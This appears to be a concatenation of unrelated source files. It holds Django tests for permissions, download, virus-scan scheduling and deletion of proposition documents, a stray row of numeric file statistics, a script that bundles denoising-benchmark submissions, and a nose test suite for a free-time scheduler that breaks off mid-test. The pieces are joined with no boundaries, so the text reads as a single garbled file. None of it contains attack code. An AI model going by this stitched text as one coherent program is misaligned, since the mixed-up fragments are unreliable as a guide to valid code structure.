user = create_test_user(permission_codenames=permissions)
api_client = self.create_api_client(user=user)
response = api_client.post(
url,
data={
'original_filename': 'test.txt',
},
)
assert response.status_code == status.HTTP_201_CREATED
response_data = response.data
entity_document = PropositionDocument.objects.get(pk=response_data['id'])
assert entity_document.original_filename == 'test.txt'
assert entity_document.proposition.pk == proposition.pk
assert response_data == {
'id': str(entity_document.pk),
'av_clean': None,
'created_by': {
'id': str(entity_document.created_by.pk),
'first_name': entity_document.created_by.first_name,
'last_name': entity_document.created_by.last_name,
'name': entity_document.created_by.name,
},
'original_filename': 'test.txt',
'url': _get_document_url(entity_document.proposition, entity_document),
'status': UploadStatus.NOT_VIRUS_SCANNED,
'signed_upload_url': 'http://document-about-ocelots',
'created_on': format_date_or_datetime(entity_document.created_on),
'uploaded_on': format_date_or_datetime(entity_document.document.uploaded_on),
}
@patch.object(Document, 'get_signed_upload_url')
def test_restricted_user_can_create_associated_document(self, get_signed_upload_url_mock):
"""Test that a restricted user can create an associated document."""
get_signed_upload_url_mock.return_value = 'http://document-about-ocelots'
user = create_test_user(
permission_codenames=(PropositionDocumentPermission.add_associated,),
dit_team=TeamFactory(),
)
investment_project = InvestmentProjectFactory(
created_by=user,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
url = reverse(
'api-v3:investment:proposition:document-collection',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.post(
url,
data={
'original_filename': 'test.txt',
},
)
assert response.status_code == status.HTTP_201_CREATED
response_data = response.data
entity_document = PropositionDocument.objects.get(pk=response_data['id'])
assert entity_document.original_filename == 'test.txt'
assert entity_document.proposition.pk == proposition.pk
assert response_data == {
'id': str(entity_document.pk),
'av_clean': None,
'created_by': {
'id': str(entity_document.created_by.pk),
'first_name': entity_document.created_by.first_name,
'last_name': entity_document.created_by.last_name,
'name': entity_document.created_by.name,
},
'original_filename': 'test.txt',
'url': _get_document_url(entity_document.proposition, entity_document),
'status': UploadStatus.NOT_VIRUS_SCANNED,
'signed_upload_url': 'http://document-about-ocelots',
'created_on': format_date_or_datetime(entity_document.created_on),
'uploaded_on': format_date_or_datetime(entity_document.document.uploaded_on),
}
def test_restricted_user_cannot_create_non_associated_documents(self):
"""Test that restricted user cannot create non associated document."""
project_creator = AdviserFactory()
investment_project = InvestmentProjectFactory(
created_by=project_creator,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
url = reverse(
'api-v3:investment:proposition:document-collection',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
user = create_test_user(
permission_codenames=(PropositionDocumentPermission.add_associated,),
dit_team=TeamFactory(),
)
api_client = self.create_api_client(user=user)
response = api_client.post(
url,
data={
'original_filename': 'test.txt',
},
)
assert response.status_code == status.HTTP_403_FORBIDDEN
assert response.data == {
'detail': 'You do not have permission to perform this action.',
}
@pytest.mark.parametrize('permissions', NON_RESTRICTED_VIEW_PERMISSIONS)
def test_documents_list(self, permissions):
"""Tests list endpoint."""
user = create_test_user(permission_codenames=permissions)
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=user,
)
entity_document.document.mark_as_scanned(True, '')
# document that is pending to be deleted, shouldn't be in the list
entity_document_to_be_deleted = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test2.txt',
created_by=user,
)
entity_document_to_be_deleted.document.mark_deletion_pending()
url = reverse(
'api-v3:investment:proposition:document-collection',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
user = create_test_user(permission_codenames=permissions)
api_client = self.create_api_client(user=user)
response = api_client.get(url)
assert response.status_code == status.HTTP_200_OK
response_data = response.data
assert response_data['count'] == 1
assert len(response_data['results']) == 1
assert response_data['results'][0] == {
'id': str(entity_document.pk),
'created_by': {
'id': str(entity_document.created_by.pk),
'first_name': entity_document.created_by.first_name,
'last_name': entity_document.created_by.last_name,
'name': entity_document.created_by.name,
},
'av_clean': True,
'original_filename': 'test.txt',
'url': _get_document_url(entity_document.proposition, entity_document),
'status': UploadStatus.VIRUS_SCANNED,
'created_on': format_date_or_datetime(entity_document.created_on),
'uploaded_on': format_date_or_datetime(entity_document.document.uploaded_on),
}
def test_restricted_user_can_list_associated_documents(self):
"""Test that restricted user can list associated documents."""
user = create_test_user(
permission_codenames=(PropositionDocumentPermission.view_associated,),
dit_team=TeamFactory(),
)
investment_project = InvestmentProjectFactory(
created_by=user,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=user,
)
entity_document.document.mark_as_scanned(True, '')
# document that is pending to be deleted, shouldn't be in the list
entity_document_to_be_deleted = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test2.txt',
created_by=user,
)
entity_document_to_be_deleted.document.mark_deletion_pending()
url = reverse(
'api-v3:investment:proposition:document-collection',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.get(url)
assert response.status_code == status.HTTP_200_OK
response_data = response.data
assert response_data['count'] == 1
assert len(response_data['results']) == 1
assert response_data['results'][0] == {
'id': str(entity_document.pk),
'created_by': {
'id': str(entity_document.created_by.pk),
'first_name': entity_document.created_by.first_name,
'last_name': entity_document.created_by.last_name,
'name': entity_document.created_by.name,
},
'av_clean': True,
'original_filename': 'test.txt',
'url': _get_document_url(entity_document.proposition, entity_document),
'status': UploadStatus.VIRUS_SCANNED,
'created_on': format_date_or_datetime(entity_document.created_on),
'uploaded_on': format_date_or_datetime(entity_document.document.uploaded_on),
}
def test_restricted_user_cannot_list_non_associated_documents(self):
"""Tests that restricted user cannot list non associated documents."""
project_creator = AdviserFactory()
investment_project = InvestmentProjectFactory(
created_by=project_creator,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=project_creator,
)
entity_document.document.mark_as_scanned(True, '')
url = reverse(
'api-v3:investment:proposition:document-collection',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
user = create_test_user(
permission_codenames=(PropositionDocumentPermission.view_associated,),
dit_team=TeamFactory(),
)
api_client = self.create_api_client(user=user)
response = api_client.get(url)
assert response.status_code == status.HTTP_403_FORBIDDEN
assert response.data == {
'detail': 'You do not have permission to perform this action.',
}
@pytest.mark.parametrize('permissions', NON_RESTRICTED_VIEW_PERMISSIONS)
def test_document_retrieval(self, permissions):
"""Tests retrieval of individual document."""
user = create_test_user(permission_codenames=permissions)
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=user,
)
url = reverse(
'api-v3:investment:proposition:document-item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.get(url)
assert response.status_code == status.HTTP_200_OK
assert response.data == {
'id': str(entity_document.pk),
'av_clean': None,
'created_by': {
'id': str(entity_document.created_by.pk),
'first_name': entity_document.created_by.first_name,
'last_name': entity_document.created_by.last_name,
'name': entity_document.created_by.name,
},
'original_filename': 'test.txt',
'url': _get_document_url(entity_document.proposition, entity_document),
'status': UploadStatus.NOT_VIRUS_SCANNED,
'created_on': format_date_or_datetime(entity_document.created_on),
'uploaded_on': format_date_or_datetime(entity_document.document.uploaded_on),
}
def test_restricted_user_can_retrieve_associated_document(self):
"""Test that restricted user can retrieve individual associated document."""
user = create_test_user(
permission_codenames=(PropositionDocumentPermission.view_associated,),
dit_team=TeamFactory(),
)
investment_project = InvestmentProjectFactory(
created_by=user,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=user,
)
url = reverse(
'api-v3:investment:proposition:document-item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.get(url)
assert response.status_code == status.HTTP_200_OK
assert response.data == {
'id': str(entity_document.pk),
'av_clean': None,
'created_by': {
'id': str(entity_document.created_by.pk),
'first_name': entity_document.created_by.first_name,
'last_name': entity_document.created_by.last_name,
'name': entity_document.created_by.name,
},
'original_filename': 'test.txt',
'url': _get_document_url(entity_document.proposition, entity_document),
'status': UploadStatus.NOT_VIRUS_SCANNED,
'created_on': format_date_or_datetime(entity_document.created_on),
'uploaded_on': format_date_or_datetime(entity_document.document.uploaded_on),
}
def test_restricted_user_cannot_retrieve_non_associated_document(self):
"""Test that restricted user cannot retrieve individual non associated document."""
user = create_test_user(
permission_codenames=(PropositionDocumentPermission.view_associated,),
dit_team=TeamFactory(),
)
project_creator = AdviserFactory()
investment_project = InvestmentProjectFactory(
created_by=project_creator,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=project_creator,
)
entity_document.document.mark_as_scanned(True, '')
url = reverse(
'api-v3:investment:proposition:document-item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.get(url)
assert response.status_code == status.HTTP_403_FORBIDDEN
assert response.data == {
'detail': 'You do not have permission to perform this action.',
}
@pytest.mark.parametrize('permissions', NON_RESTRICTED_VIEW_PERMISSIONS)
def test_document_with_deletion_pending_retrieval(self, permissions):
"""Tests retrieval of individual document that is pending deletion."""
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk, original_filename='test.txt',
)
entity_document.document.mark_deletion_pending()
url = reverse(
'api-v3:investment:proposition:document-item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
user = create_test_user(permission_codenames=permissions)
api_client = self.create_api_client(user=user)
response = api_client.get(url)
assert response.status_code == status.HTTP_404_NOT_FOUND
@pytest.mark.parametrize(
'av_clean,expected_status', (
(True, status.HTTP_200_OK),
(False, status.HTTP_403_FORBIDDEN),
),
)
@patch('datahub.documents.models.sign_s3_url')
def test_document_download(self, sign_s3_url, av_clean, expected_status):
"""Tests download of individual document."""
sign_s3_url.return_value = 'http://what'
user = create_test_user(
permission_codenames=(PropositionDocumentPermission.view_all,),
)
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=user,
)
entity_document.document.mark_as_scanned(av_clean, '')
url = reverse(
'api-v3:investment:proposition:document-item-download',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.get(url)
assert response.status_code == expected_status
if response.status_code == status.HTTP_200_OK:
assert response.data == {
'id': str(entity_document.pk),
'av_clean': True,
'created_by': {
'id': str(entity_document.created_by.pk),
'first_name': entity_document.created_by.first_name,
'last_name': entity_document.created_by.last_name,
'name': entity_document.created_by.name,
},
'original_filename': 'test.txt',
'url': _get_document_url(entity_document.proposition, entity_document),
'status': UploadStatus.VIRUS_SCANNED,
'document_url': 'http://what',
'created_on': format_date_or_datetime(entity_document.created_on),
'uploaded_on': format_date_or_datetime(entity_document.document.uploaded_on),
}
@pytest.mark.parametrize('permissions', NON_RESTRICTED_VIEW_PERMISSIONS)
def test_document_download_when_not_scanned(self, permissions):
"""Tests download of individual document when not yet virus scanned."""
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk, original_filename='test.txt',
)
url = reverse(
'api-v3:investment:proposition:document-item-download',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
user = create_test_user(permission_codenames=permissions)
api_client = self.create_api_client(user=user)
response = api_client.get(url)
assert response.status_code == status.HTTP_503_SERVICE_UNAVAILABLE
@pytest.mark.parametrize('permissions', NON_RESTRICTED_CHANGE_PERMISSIONS)
@patch('datahub.documents.tasks.virus_scan_document.apply_async')
def test_document_upload_schedule_virus_scan(
self,
virus_scan_document_apply_async,
permissions,
):
"""Tests scheduling virus scan after upload completion.
Checks that a virus scan of the document was scheduled. Virus scanning is
tested separately in the documents app.
"""
user = create_test_user(permission_codenames=permissions)
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=user,
)
url = reverse(
'api-v3:investment:proposition:document-item-callback',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.post(url)
assert response.status_code == status.HTTP_200_OK
entity_document.document.refresh_from_db()
assert response.data == {
'id': str(entity_document.pk),
'av_clean': None,
'created_by': {
'id': str(entity_document.created_by.pk),
'first_name': entity_document.created_by.first_name,
'last_name': entity_document.created_by.last_name,
'name': entity_document.created_by.name,
},
'original_filename': 'test.txt',
'url': _get_document_url(entity_document.proposition, entity_document),
'status': UploadStatus.VIRUS_SCANNING_SCHEDULED,
'created_on': format_date_or_datetime(entity_document.created_on),
'uploaded_on': format_date_or_datetime(entity_document.document.uploaded_on),
}
virus_scan_document_apply_async.assert_called_once_with(
args=(str(entity_document.document.pk), ),
)
@patch('datahub.documents.tasks.virus_scan_document.apply_async')
def test_restricted_user_can_schedule_virus_scan_for_associated_document(
self,
virus_scan_document_apply_async,
):
"""
Test that restricted user can schedule a virus scan for associated document.
"""
user = create_test_user(
permission_codenames=(PropositionDocumentPermission.change_associated,),
dit_team=TeamFactory(),
)
investment_project = InvestmentProjectFactory(
created_by=user,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=user,
)
url = reverse(
'api-v3:investment:proposition:document-item-callback',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.post(url)
assert response.status_code == status.HTTP_200_OK
entity_document.document.refresh_from_db()
assert response.data == {
'id': str(entity_document.pk),
'av_clean': None,
'created_by': {
'id': str(entity_document.created_by.pk),
'first_name': entity_document.created_by.first_name,
'last_name': entity_document.created_by.last_name,
'name': entity_document.created_by.name,
},
'original_filename': 'test.txt',
'url': _get_document_url(entity_document.proposition, entity_document),
'status': UploadStatus.VIRUS_SCANNING_SCHEDULED,
'created_on': format_date_or_datetime(entity_document.created_on),
'uploaded_on': format_date_or_datetime(entity_document.document.uploaded_on),
}
virus_scan_document_apply_async.assert_called_once_with(
args=(str(entity_document.document.pk), ),
)
def test_restricted_user_cannot_schedule_virus_scan_for_non_associated_document(self):
"""Test that restricted user cannot schedule a virus scan for non associated document."""
user = create_test_user(
permission_codenames=(PropositionDocumentPermission.change_associated,),
dit_team=TeamFactory(),
)
project_creator = AdviserFactory()
investment_project = InvestmentProjectFactory(
created_by=project_creator,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=project_creator,
)
url = reverse(
'api-v3:investment:proposition:document-item-callback',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.post(url)
assert response.status_code == status.HTTP_403_FORBIDDEN
assert response.data == {
'detail': 'You do not have permission to perform this action.',
}
entity_document.document.refresh_from_db()
assert entity_document.document.status == UploadStatus.NOT_VIRUS_SCANNED
@pytest.mark.parametrize('permissions', NON_RESTRICTED_DELETE_PERMISSIONS)
@patch('datahub.documents.tasks.delete_document.apply_async')
def test_document_delete(self, delete_document, permissions):
"""Tests document deletion."""
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk, original_filename='test.txt',
)
document = entity_document.document
document.mark_scan_scheduled()
document.mark_as_scanned(True, 'reason')
url = reverse(
'api-v3:investment:proposition:document-item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
document_pk = entity_document.document.pk
user = create_test_user(permission_codenames=permissions)
api_client = self.create_api_client(user=user)
response = api_client.delete(url)
assert response.status_code == status.HTTP_204_NO_CONTENT
delete_document.assert_called_once_with(args=(document_pk, ))
@patch('datahub.documents.tasks.delete_document.apply_async')
def test_restricted_user_can_delete_associated_document(self, delete_document):
"""Test that restricted user can delete associated document."""
user = create_test_user(
permission_codenames=(PropositionDocumentPermission.delete_associated,),
dit_team=TeamFactory(),
)
investment_project = InvestmentProjectFactory(
created_by=user,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=user,
)
document = entity_document.document
document.mark_scan_scheduled()
document.mark_as_scanned(True, 'reason')
url = reverse(
'api-v3:investment:proposition:document-item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
document_pk = entity_document.document.pk
api_client = self.create_api_client(user=user)
response = api_client.delete(url)
assert response.status_code == status.HTTP_204_NO_CONTENT
delete_document.assert_called_once_with(args=(document_pk, ))
@patch('datahub.documents.tasks.delete_document.apply_async')
def test_restricted_user_cannot_delete_non_associated_document(self, delete_document):
"""Test that restricted user cannot delete non associated document."""
user = create_test_user(
permission_codenames=(PropositionDocumentPermission.delete_associated,),
dit_team=TeamFactory(),
)
project_creator = AdviserFactory()
investment_project = InvestmentProjectFactory(
created_by=project_creator,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=project_creator,
)
document = entity_document.document
document.mark_scan_scheduled()
document.mark_as_scanned(True, 'reason')
url = reverse(
'api-v3:investment:proposition:document-item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.delete(url)
assert response.status_code == status.HTTP_403_FORBIDDEN
assert response.data == {
'detail': 'You do not have permission to perform this action.',
}
entity_document.document.refresh_from_db()
assert entity_document.document.status == UploadStatus.VIRUS_SCANNED
assert delete_document.called is False
@patch('datahub.documents.tasks.delete_document.apply_async')
def test_document_delete_without_permission(self, delete_document):
"""Tests user can't delete document without permissions."""
user = create_test_user(
permission_codenames=(),
dit_team=TeamFactory(),
)
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk, original_filename='test.txt',
)
entity_document.document.mark_scan_scheduled()
entity_document.document.mark_as_scanned(True, 'reason')
url = reverse(
'api-v3:investment:proposition:document-item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.delete(url)
assert response.status_code == status.HTTP_403_FORBIDDEN
assert delete_document.called is False
@pytest.mark.parametrize('permissions', NON_RESTRICTED_DELETE_PERMISSIONS)
@patch('datahub.documents.tasks.delete_document.apply_async')
def test_document_delete_creates_user_event_log(self, delete_document, permissions):
"""Tests document deletion creates user event log."""
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk, original_filename='test.txt',
)
document = entity_document.document
document.mark_scan_scheduled()
document.mark_as_scanned(True, 'reason')
url = reverse(
'api-v3:investment:proposition:document-item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
document_pk = entity_document.document.pk
expected_user_event_data = {
'id': str(entity_document.pk),
'url': entity_document.url,
'status': entity_document.document.status,
'av_clean': entity_document.document.av_clean,
'created_by': None,
'created_on': format_date_or_datetime(entity_document.created_on),
'uploaded_on': format_date_or_datetime(entity_document.document.uploaded_on),
'original_filename': entity_document.original_filename,
'proposition_id': str(entity_document.proposition_id),
}
user = create_test_user(permission_codenames=permissions)
api_client = self.create_api_client(user=user)
frozen_time = datetime.datetime(2018, 1, 2, 12, 30, 50, tzinfo=utc)
with freeze_time(frozen_time):
response = api_client.delete(url)
assert response.status_code == status.HTTP_204_NO_CONTENT
delete_document.assert_called_once_with(args=(document_pk, ))
assert UserEvent.objects.count() == 1
user_event = UserEvent.objects.first()
assert user_event.adviser == user
assert user_event.type == UserEventType.PROPOSITION_DOCUMENT_DELETE
assert user_event.timestamp == frozen_time
assert user_event.api_url_path == url
assert user_event.data == expected_user_event_data
@patch.object(Document, 'mark_deletion_pending')
def test_document_delete_failure_wont_create_user_event_log(self, mark_deletion_pending):
"""Tests document deletion failure won't create user event log."""
mark_deletion_pending.side_effect = Exception('No way!')
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk, original_filename='test.txt',
)
document = entity_document.document
document.mark_scan_scheduled()
document.mark_as_scanned(True, 'reason')
url = reverse(
'api-v3:investment:proposition:document-item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
user = create_test_user(
permission_codenames=(PropositionDocumentPermission.delete_all,),
dit_team=TeamFactory(),
)
api_client = self.create_api_client(user=user)
with pytest.raises(Exception):
api_client.delete(url)
assert UserEvent.objects.count() == 0
def test_document_upload_status_no_status_without_permission(self):
"""Tests user without permission can't call upload status endpoint."""
user = create_test_user(
permission_codenames=(),
dit_team=TeamFactory(),
)
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk, original_filename='test.txt',
)
url = reverse(
'api-v3:investment:proposition:document-item-callback',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.post(url, data={})
assert response.status_code == status.HTTP_403_FORBIDDEN
def _get_document_url(proposition, entity_document):
return reverse(
'api-v3:investment:proposition:document-item-download',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
| 39.297388 | 98 | 0.616752 | 8,977 | 93,292 | 6.113958 | 0.035981 | 0.051016 | 0.022848 | 0.029371 | 0.914366 | 0.899499 | 0.874428 | 0.855771 | 0.82671 | 0.808418 | 0 | 0.006609 | 0.289628 | 93,292 | 2,373 | 99 | 39.313949 | 0.821569 | 0.046724 | 0 | 0.733106 | 0 | 0 | 0.117947 | 0.039289 | 0 | 0 | 0 | 0 | 0.073408 | 1 | 0.031113 | false | 0 | 0.009237 | 0.000486 | 0.045698 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
# Author: Tobias Plötz, TU Darmstadt (tobias.ploetz@visinf.tu-darmstadt.de)
# This file is part of the implementation as described in the CVPR 2017 paper:
# Tobias Plötz and Stefan Roth, Benchmarking Denoising Algorithms with Real Photographs.
# Please see the file LICENSE.txt for the license governing this code.
import numpy as np
import scipy.io as sio
import os
def bundle_submissions_raw(submission_folder, session):
    '''
    Bundles submission data for raw denoising.

    submission_folder   Folder where the denoised images reside
    session             Name of the output subfolder

    Output is written to <submission_folder>/<session>/. Please submit
    the content of that folder.
    '''
out_folder = os.path.join(submission_folder, session)
    os.makedirs(out_folder, exist_ok=True)
israw = True
eval_version="1.0"
for i in range(50):
        Idenoised = np.zeros((20,), dtype=object)
for bb in range(20):
filename = '%04d_%02d.mat'%(i+1,bb+1)
s = sio.loadmat(os.path.join(submission_folder,filename))
Idenoised_crop = s["Idenoised_crop"]
Idenoised[bb] = Idenoised_crop
filename = '%04d.mat'%(i+1)
sio.savemat(os.path.join(out_folder, filename),
{"Idenoised": Idenoised,
"israw": israw,
"eval_version": eval_version},
)
def bundle_submissions_srgb(submission_folder, session):
    '''
    Bundles submission data for sRGB denoising.

    submission_folder   Folder where the denoised images reside
    session             Name of the output subfolder

    Output is written to <submission_folder>/<session>/. Please submit
    the content of that folder.
    '''
out_folder = os.path.join(submission_folder, session)
    os.makedirs(out_folder, exist_ok=True)
israw = False
eval_version="1.0"
for i in range(50):
        Idenoised = np.zeros((20,), dtype=object)
for bb in range(20):
filename = '%04d_%02d.mat'%(i+1,bb+1)
s = sio.loadmat(os.path.join(submission_folder,filename))
Idenoised_crop = s["Idenoised_crop"]
Idenoised[bb] = Idenoised_crop
filename = '%04d.mat'%(i+1)
sio.savemat(os.path.join(out_folder, filename),
{"Idenoised": Idenoised,
"israw": israw,
"eval_version": eval_version},
)
def bundle_submissions_srgb_v1(submission_folder, session):
    '''
    Bundles submission data for sRGB denoising.

    Variant of bundle_submissions_srgb for submissions whose per-crop
    files use a non-zero-padded crop index ('%04d_%d.mat').

    submission_folder   Folder where the denoised images reside
    session             Name of the output subfolder

    Output is written to <submission_folder>/<session>/. Please submit
    the content of that folder.
    '''
out_folder = os.path.join(submission_folder, session)
    os.makedirs(out_folder, exist_ok=True)
israw = False
eval_version="1.0"
for i in range(50):
        Idenoised = np.zeros((20,), dtype=object)
for bb in range(20):
filename = '%04d_%d.mat'%(i+1,bb+1)
s = sio.loadmat(os.path.join(submission_folder,filename))
Idenoised_crop = s["Idenoised_crop"]
Idenoised[bb] = Idenoised_crop
filename = '%04d.mat'%(i+1)
sio.savemat(os.path.join(out_folder, filename),
{"Idenoised": Idenoised,
"israw": israw,
"eval_version": eval_version},
                    )
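For reference, all three bundlers above assume the same submission layout: 50 test images with 20 crops each, named by 1-based, zero-padded indices. A minimal stdlib-only sketch of that naming convention follows; the helper names are ours for illustration, not part of the benchmark API:

```python
def crop_filename(image_idx, crop_idx, pad_crop=True):
    """Per-crop .mat name for 0-based indices; the crop index is
    zero-padded ('%02d') except in the v1 scheme ('%d')."""
    fmt = '%04d_%02d.mat' if pad_crop else '%04d_%d.mat'
    return fmt % (image_idx + 1, crop_idx + 1)


def bundled_filename(image_idx):
    """Per-image bundle name written to the output folder."""
    return '%04d.mat' % (image_idx + 1)


if __name__ == '__main__':
    print(crop_filename(0, 0))          # 0001_01.mat
    print(crop_filename(0, 0, False))   # 0001_1.mat
    print(bundled_filename(49))         # 0050.mat
```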
import main
import nose
import arrow
import datetime
##### NOSE TEST SUITE INCLUDES:
# - 1 one-event test
# - 7 two-event tests to check all base cases for two events with various types of overlap
# - 2 complete disaster tests
#####
def testCase1():
# test case to test one event
entry1 = {'start':arrow.get('2015-12-10T10:00:00-08:00'), 'end':arrow.get('2015-12-10T11:00:00-08:00')}
entryList = [entry1]
startDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
endDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
resultingFreeTimes = str(main.generateFreeTimes(entryList,startDate,endDate))
expected = ["[[<Arrow [2015-12-10T07:00:00-08:00]>, <Arrow [2015-12-10T10:00:00-08:00]>], ",
"[<Arrow [2015-12-10T11:00:00-08:00]>, <Arrow [2015-12-10T21:00:00-08:00]>]]"]
expected = ''.join(expected)
assert resultingFreeTimes == expected
def testCase2():
    # test case to check the easiest two-event system: two non-overlapping events
entry1 = {'start':arrow.get('2015-12-10T10:00:00-08:00'), 'end':arrow.get('2015-12-10T11:00:00-08:00')}
entry2 = {'start':arrow.get('2015-12-10T14:00:00-08:00'), 'end':arrow.get('2015-12-10T15:00:00-08:00')}
entryList = [entry1,entry2]
startDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
endDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
resultingFreeTimes = str(main.generateFreeTimes(entryList,startDate,endDate))
expected = ["[[<Arrow [2015-12-10T07:00:00-08:00]>, <Arrow [2015-12-10T10:00:00-08:00]>], ",
"[<Arrow [2015-12-10T11:00:00-08:00]>, <Arrow [2015-12-10T14:00:00-08:00]>], ",
"[<Arrow [2015-12-10T15:00:00-08:00]>, <Arrow [2015-12-10T21:00:00-08:00]>]]"]
expected = ''.join(expected)
assert resultingFreeTimes == expected
def testCase3():
# test case to check two-event system where both entries have the same start and the first event ends before the second event ends
entry1 = {'start':arrow.get('2015-12-10T10:00:00-08:00'), 'end':arrow.get('2015-12-10T12:00:00-08:00')}
entry2 = {'start':arrow.get('2015-12-10T10:00:00-08:00'), 'end':arrow.get('2015-12-10T15:00:00-08:00')}
entryList = [entry1,entry2]
startDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
endDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
resultingFreeTimes = str(main.generateFreeTimes(entryList,startDate,endDate))
print("RESULTING")
print(resultingFreeTimes)
expected = ["[[<Arrow [2015-12-10T07:00:00-08:00]>, <Arrow [2015-12-10T10:00:00-08:00]>], ",
"[<Arrow [2015-12-10T15:00:00-08:00]>, <Arrow [2015-12-10T21:00:00-08:00]>]]"]
expected = ''.join(expected)
assert resultingFreeTimes == expected
def testCase4():
# test case to check two-event system where both entries have the same start and the second event ends before the first event ends
entry1 = {'start':arrow.get('2015-12-10T10:00:00-08:00'), 'end':arrow.get('2015-12-10T18:00:00-08:00')}
entry2 = {'start':arrow.get('2015-12-10T10:00:00-08:00'), 'end':arrow.get('2015-12-10T11:00:00-08:00')}
